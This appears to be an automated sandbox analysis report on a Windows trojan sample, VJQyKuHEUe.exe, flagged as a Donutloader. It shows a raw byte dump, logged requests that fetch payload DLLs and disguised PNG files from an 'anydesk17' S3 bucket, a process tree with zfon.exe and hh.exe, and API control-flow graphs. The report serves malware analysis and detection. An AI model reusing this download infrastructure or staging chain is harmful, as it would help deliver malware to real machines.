                                                                                              2024-12-18 12:05:43 UTC16384INData Raw: ff ff 48 3b c3 74 14 4c 8b 43 08 48 8b c8 48 8b 13 48 83 c4 20 5b e9 7f 01 ff ff 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc c2 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc c2 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc c2 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 49 8b d8 4c 8b 02 4d 85 c0 74 16 49 8b 40 08 48 63 48 04 49 83 c0 08 49 03 c8 48 8b 01 ff 50 08 90 48 8b 13 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 30 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc 40 55 53 56 57 41 54 41 55 41 56 41 57 48 8d 6c 24 e1 48 81 ec f8 00 00 00 48 c7 45 af fe ff ff ff 48 8b 05 d8 ef 24 00 48 33 c4 48 89 45 0f 49 8b f1 4d 8b e8 4c 8b e2 4c 8b f9 48 89 55 b7 4c 89 45 bf 33 ff
                                                                                              Data Ascii: H;tLCHHH [H [@SH0HD$ ILMtI@HcHIIHPHHtHBHcHHHHPH0[@USVWATAUAVAWHl$HHEH$H3HEIMLLHULE3


Session ID: 1
Source IP: 192.168.2.5
Source Port: 49714
Destination IP: 3.5.237.31
Destination Port: 443
PID: 1472
Process: C:\Users\user\Desktop\VJQyKuHEUe.exe
Timestamp: 2024-12-18 12:05:49 UTC, Bytes transferred: 70, Direction: OUT, Data:
GET /view.png HTTP/1.1
Host: anydesk17.s3.ap-east-1.amazonaws.com
Timestamp: 2024-12-18 12:05:50 UTC, Bytes transferred: 436, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                              x-amz-id-2: xRLddAZEV2GXRAKcvPPknUbNVzoggQGjbVO5254EdMYj9oRQpOWZFYyfbdW5bY3uQ8xLA66XnCiDrx3aVAig23jRoQuixdV9
                                                                                              x-amz-request-id: FQPA43K6P9CB0WEG
                                                                                              Date: Wed, 18 Dec 2024 12:05:51 GMT
                                                                                              Last-Modified: Thu, 12 Dec 2024 20:28:18 GMT
                                                                                              ETag: "1e17e3f8b9917ce02cdb53f289db96c9"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: image/png
                                                                                              Content-Length: 376421
                                                                                              Server: AmazonS3
                                                                                              Connection: close


Session ID: 2
Source IP: 192.168.2.5
Source Port: 49715
Destination IP: 3.5.238.183
Destination Port: 443
PID: 1472
Process: C:\Users\user\Desktop\VJQyKuHEUe.exe
Timestamp: 2024-12-18 12:05:53 UTC, Bytes transferred: 69, Direction: OUT, Data:
GET /aut.png HTTP/1.1
Host: anydesk17.s3.ap-east-1.amazonaws.com
Timestamp: 2024-12-18 12:05:54 UTC, Bytes transferred: 446, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                              x-amz-id-2: nHTfFCDebI1862kJlPX+EJdcbgbw669Hft7bRRxVMzCWJFQ3N+32OfShzoDS62cICk2+TDha+E12LZB8YsaHHX71sfFLdj8O
                                                                                              x-amz-request-id: NX351FFWV52Y3C2P
                                                                                              Date: Wed, 18 Dec 2024 12:05:55 GMT
                                                                                              Last-Modified: Fri, 13 Dec 2024 18:14:05 GMT
                                                                                              ETag: "0ca6a22e9feadb18c76712b5b0256b96"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: binary/octet-stream
                                                                                              Content-Length: 660160
                                                                                              Server: AmazonS3
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.5497223.5.238.1834431472C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:05:57 UTC78OUTGET /VCRUNTIME140.dll HTTP/1.1
                                                                                              Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                              2024-12-18 12:05:58 UTC  446                IN         HTTP/1.1 200 OK
                                                                                              x-amz-id-2: 93nUhUrn3BFNvBZk1lw5sMYsxMwwh+G2dSpVH1hf9Yncga5IzIFNWtRhMPT0w0WEAJ8P4qKyj09pShP8qb0lQsngup8cQ4Ll
                                                                                              x-amz-request-id: NYCQTQ6YQG88YKE0
                                                                                              Date: Wed, 18 Dec 2024 12:05:59 GMT
                                                                                              Last-Modified: Wed, 20 Nov 2024 18:57:22 GMT
                                                                                              ETag: "e9b690fbe5c4b96871214379659dd928"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: binary/octet-stream
                                                                                              Content-Length: 119376
                                                                                              Server: AmazonS3
                                                                                              Connection: close


                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                              4           192.168.2.5  49731        3.5.239.146     443               1472  C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                                              2024-12-18 12:06:01 UTC  80                 OUT        GET /vcruntime140_1.dll HTTP/1.1
                                                                                              Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                              2024-12-18 12:06:01 UTC  445                IN         HTTP/1.1 200 OK
                                                                                              x-amz-id-2: v2OfH5p0YHPAOx9KrQh2/x/Zi0gKfb/6vH3zqr6C6DU9YyOYTkIThmmrZwdIViTRjgqfiDISOWlbHF2txE/ZrYVtnO7Nl9kS
                                                                                              x-amz-request-id: VKC41TPQQYCDH9DT
                                                                                              Date: Wed, 18 Dec 2024 12:06:02 GMT
                                                                                              Last-Modified: Wed, 20 Nov 2024 18:57:22 GMT
                                                                                              ETag: "eb49c1d33b41eb49dfed58aafa9b9a8f"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: binary/octet-stream
                                                                                              Content-Length: 49744
                                                                                              Server: AmazonS3
                                                                                              Connection: close


                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                              5           192.168.2.5  49743        3.5.239.146     443               1472  C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                                              2024-12-18 12:06:04 UTC  74                 OUT        GET /MSVCP140.dll HTTP/1.1
                                                                                              Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                              2024-12-18 12:06:04 UTC  446                IN         HTTP/1.1 200 OK
                                                                                              x-amz-id-2: X4Uemz/M3VXC4xteU5HMr3GUjh8YPoQJz9cSehePlTdXXRqiclhni3MwVNtlCkXYHu///ll032atkDPZNM6mojH7TtXtDybd
                                                                                              x-amz-request-id: 4CV81EDKFY6RTFZR
                                                                                              Date: Wed, 18 Dec 2024 12:06:05 GMT
                                                                                              Last-Modified: Wed, 20 Nov 2024 18:57:22 GMT
                                                                                              ETag: "c1b066f9e3e2f3a6785161a8c7e0346a"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: binary/octet-stream
                                                                                              Content-Length: 627992
                                                                                              Server: AmazonS3
                                                                                              Connection: close
                                                                                              Data Ascii: P3~AHH@0tAFI&AFAFB8?uL$ 1l$$HT$8IHCL;AB*H\$8Ll$PL$ HH;HT$(IC]II3L$$H.D$$HL$XH3H$H`A_A^A]A\_^]H\$Hl$Ht$WAVAWH H


Session ID: 6
Source IP: 192.168.2.5
Source Port: 49749
Destination IP: 52.95.161.33
Destination Port: 443
PID: 1472
Process: C:\Users\user\Desktop\VJQyKuHEUe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:06:08 UTC | 72 | OUT | GET /libcef.dll HTTP/1.1
                                                                                              Host: anydesk17.s3.ap-east-1.amazonaws.com
2024-12-18 12:06:09 UTC | 426 | IN | HTTP/1.1 200 OK
                                                                                              x-amz-id-2: hnGJtKqRsc64KutWy3Z9R5gk5OIuK8jc4XnM0FXV7gHXw7/rDUDoD/rFKt/6uXaveNPmFGb9EZA=
                                                                                              x-amz-request-id: 08GJXMK4HC92T4HH
                                                                                              Date: Wed, 18 Dec 2024 12:06:09 GMT
                                                                                              Last-Modified: Sat, 07 Dec 2024 17:32:42 GMT
                                                                                              ETag: "d7b50924ab14320b946526eb3db6a08f"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: binary/octet-stream
                                                                                              Content-Length: 271126
                                                                                              Server: AmazonS3
                                                                                              Connection: close

                                                                                              Target ID:0
                                                                                              Start time:07:05:38
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\VJQyKuHEUe.exe"
                                                                                              Imagebase:0x500000
                                                                                              File size:185'744 bytes
                                                                                              MD5 hash:703274FA7A3FEBB125CE7EA741A2D546
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:07:06:17
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe"
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.2529216553.000001AB8875C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:07:06:17
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000003.2529019018.000002DC4A449000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.2604535605.000002DC4BEE7000.00000008.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:07:06:17
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\hh.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\windows\hh.exe
                                                                                              Imagebase:0x7ff607f60000
                                                                                              File size:18'432 bytes
                                                                                              MD5 hash:2C8FE78D53C8CA27523A71DFD2938241
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.4591031165.000001CDCB5B0000.00000020.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Target ID:10
                                                                                              Start time:07:06:19
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 2000 -s 456
                                                                                              Imagebase:0x7ff717de0000
                                                                                              File size:570'736 bytes
                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:11
                                                                                              Start time:07:06:20
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\explorer.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                              Imagebase:0x7ff674740000
                                                                                              File size:5'141'208 bytes
                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000000.2552109850.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000002.2582901850.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:13
                                                                                              Start time:07:06:23
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 2000 -s 92
                                                                                              Imagebase:0x7ff717de0000
                                                                                              File size:570'736 bytes
                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:14
                                                                                              Start time:07:06:23
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\explorer.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:explorer.exe
                                                                                              Imagebase:0x7ff674740000
                                                                                              File size:5'141'208 bytes
                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:26
                                                                                              Start time:07:06:45
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe"
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:27
                                                                                              Start time:07:06:46
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:28
                                                                                              Start time:07:07:01
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:29
                                                                                              Start time:07:07:01
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:30
                                                                                              Start time:07:08:00
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:31
                                                                                              Start time:07:08:00
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:34
                                                                                              Start time:07:09:01
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:35
                                                                                              Start time:07:09:03
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
                                                                                              Imagebase:0x7ff7f96e0000
                                                                                              File size:2'659'840 bytes
                                                                                              MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true


                                                                                                Execution Graph

                                                                                                Execution Coverage:8.2%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:123
                                                                                                Total number of Limit Nodes:9

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 357 275b1d0-275b1df 358 275b1e1-275b1ee call 275ab94 357->358 359 275b20b-275b20f 357->359 365 275b204 358->365 366 275b1f0 358->366 361 275b211-275b21b 359->361 362 275b223-275b264 359->362 361->362 368 275b266-275b26e 362->368 369 275b271-275b27f 362->369 365->359 413 275b1f6 call 275b459 366->413 414 275b1f6 call 275b468 366->414 368->369 370 275b281-275b286 369->370 371 275b2a3-275b2a5 369->371 373 275b291 370->373 374 275b288-275b28f call 275aba0 370->374 376 275b2a8-275b2af 371->376 372 275b1fc-275b1fe 372->365 375 275b340-275b400 372->375 378 275b293-275b2a1 373->378 374->378 408 275b402-275b405 375->408 409 275b408-275b433 GetModuleHandleW 375->409 379 275b2b1-275b2b9 376->379 380 275b2bc-275b2c3 376->380 378->376 379->380 383 275b2c5-275b2cd 380->383 384 275b2d0-275b2d9 call 275abb0 380->384 383->384 388 275b2e6-275b2eb 384->388 389 275b2db-275b2e3 384->389 390 275b2ed-275b2f4 388->390 391 275b309-275b316 388->391 389->388 390->391 393 275b2f6-275b306 call 275abc0 call 275abd0 390->393 398 275b339-275b33f 391->398 399 275b318-275b336 391->399 393->391 399->398 408->409 410 275b435-275b43b 409->410 411 275b43c-275b450 409->411 410->411 413->372 414->372
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: b2bf3afd7bb9c4dc3f75808d34211c5dbc1b8c60e312194b96338df62a705785
                                                                                                • Instruction ID: abfaa20250672d2efccf037a2bf20ba8be780b03c0fa4c91ffd84564d9c255a8
                                                                                                • Opcode Fuzzy Hash: b2bf3afd7bb9c4dc3f75808d34211c5dbc1b8c60e312194b96338df62a705785
                                                                                                • Instruction Fuzzy Hash: BC712670A00B158FD724DF69D04476ABBF1FF88304F108A2DD85AD7A54D7B4E945CBA0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 415 275b459-275b460 416 275b403-275b433 GetModuleHandleW 415->416 417 275b462-275b464 415->417 423 275b435-275b43b 416->423 424 275b43c-275b450 416->424 419 275b466-275b471 417->419 420 275b4d0-275b51f 417->420 428 275b47c-275b47e 419->428 429 275b477 call 275ab94 419->429 421 275b521-275b546 420->421 422 275b573-275b5c3 420->422 421->422 433 275b548-275b54a 421->433 441 275b5c5-275b5cb 422->441 442 275b5cc-275b5fd 422->442 423->424 431 275b480-275b491 call 275abec 428->431 432 275b4ae-275b4b3 428->432 429->428 444 275b4a5-275b4ac call 275ac04 431->444 445 275b493-275b49c call 275abf8 431->445 435 275b56d-275b570 433->435 436 275b54c-275b556 433->436 435->422 439 275b558 436->439 440 275b55a-275b569 436->440 439->440 440->440 446 275b56b 440->446 441->442 448 275b60d 442->448 449 275b5ff-275b603 442->449 444->432 453 275b4a1-275b4a3 445->453 446->435 456 275b60e 448->456 449->448 452 275b605-275b608 call 275909c 449->452 452->448 453->432 456->456
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0275B1EC), ref: 0275B426
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: 0ccc47a795cf6b96abc1f2bfbf6db20756cc07041ba3ee8665439d43a0305870
                                                                                                • Instruction ID: be4286a5d9a499bb5c3f6ffb10197ce456993d540bccd63e545628b32885cb0a
                                                                                                • Opcode Fuzzy Hash: 0ccc47a795cf6b96abc1f2bfbf6db20756cc07041ba3ee8665439d43a0305870
                                                                                                • Instruction Fuzzy Hash: C4518EB1E002688FDB14DF99D8447AEFBF2EF88318F149129E818E7294C7B49845CF91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 457 2755f64-2755f6d 458 2755f73-2756031 CreateActCtxA 457->458 460 2756033-2756039 458->460 461 275603a-2756094 458->461 460->461 468 2756096-2756099 461->468 469 27560a3-27560a7 461->469 468->469 470 27560a9-27560b5 469->470 471 27560b8 469->471 470->471 473 27560b9 471->473 473->473
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 02756021
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: f27f7ab07e69e28505ff10dcfdaa7c910ca8e4ae8080da84b45f4434d1d0e9fa
                                                                                                • Instruction ID: 7a1d197c53be78e33279f6c9383d4571865f192a93752ff66964c0e559b68a15
                                                                                                • Opcode Fuzzy Hash: f27f7ab07e69e28505ff10dcfdaa7c910ca8e4ae8080da84b45f4434d1d0e9fa
                                                                                                • Instruction Fuzzy Hash: 9541E2B0C00619CFDB24DFA9C844B9DFBB6BF49314F20816AD418AB254DBB56946CF91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 474 2754704-2756031 CreateActCtxA 477 2756033-2756039 474->477 478 275603a-2756094 474->478 477->478 485 2756096-2756099 478->485 486 27560a3-27560a7 478->486 485->486 487 27560a9-27560b5 486->487 488 27560b8 486->488 487->488 490 27560b9 488->490 490->490
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 02756021
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: 374bd608dc4599ebdb8a8d5c41f11362a84e9473b23c61c6aa332ac89d1c44dc
                                                                                                • Instruction ID: beb4aae83fa4fc4a7d9d90903ab1f643bd74f2964bfb2f3d9b4a4f3e8bc4f97f
                                                                                                • Opcode Fuzzy Hash: 374bd608dc4599ebdb8a8d5c41f11362a84e9473b23c61c6aa332ac89d1c44dc
                                                                                                • Instruction Fuzzy Hash: DA41E2B0C0061DCBDB24DFA9C844B9DFBF6BF49304F20806AD408AB255DBB5A946CF91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 491 275cf78-275d73c DuplicateHandle 494 275d745-275d762 491->494 495 275d73e-275d744 491->495 495->494
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0275D66E,?,?,?,?,?), ref: 0275D72F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 498 275d6a0-275d6a6 499 275d6ac-275d73c DuplicateHandle 498->499 500 275d745-275d762 499->500 501 275d73e-275d744 499->501 501->500
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0275D66E,?,?,?,?,?), ref: 0275D72F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 504 2759cc8-2759d24 506 2759d26-2759d4e KiUserCallbackDispatcher 504->506 507 2759d72-2759d8b 504->507 508 2759d57-2759d6b 506->508 509 2759d50-2759d56 506->509 508->507 509->508
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02759D3D
                                                                                                Memory Dump Source
